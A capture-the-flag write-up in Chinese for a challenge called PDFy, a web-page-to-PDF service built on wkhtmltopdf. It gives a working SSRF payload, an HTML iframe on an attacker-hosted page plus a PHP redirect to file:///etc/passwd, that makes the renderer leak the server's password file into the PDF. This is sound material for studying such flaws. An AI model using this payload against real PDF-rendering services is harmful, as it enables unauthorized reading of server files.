PDFy
Tip
Welcome to PDFy, the exciting challenge where you turn your favorite web pages into portable PDF documents! It's your chance to capture, share, and preserve the best of the internet with precision and creativity. Join us and transform the way we save and cherish web content! NOTE: Leak /etc/passwd to get the flag!
打开是一个网页截图功能的网站,里面输入网址,然后会截图
这一眼SSRF
随便输入一些会报错
这里爆出来他的源码实际上使用的是 wkhtmltopdf
搜索issue可以发现有些SSRF
简单看了下大概就是创建两个文件
index.html
<!DOCTYPE html>
<html lang="zh-CN">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<style>
body {
font-family: Arial, sans-serif;
text-align: center;
margin-top: 50px;
}
iframe {
width: 80%;
height: 400px;
border: 1px solid #ccc;
margin-top: 20px;
}
</style>
</head>
<body>
<iframe src="http://YOUR_PUBLIC_IP_OR_GITHUB_PAGES_URL/redirect.php" title="Local File Loader"></iframe>
</body>
</html>
redirect.php
<?php
header("Location: file:///etc/passwd");
exit();
?>
把这两个放到公网IP上面去,然后访问index.html,就会截屏其内容,但是其中的iframe会读取到其/etc/passwd文件内容
读取后保存的pdf中就有文件了
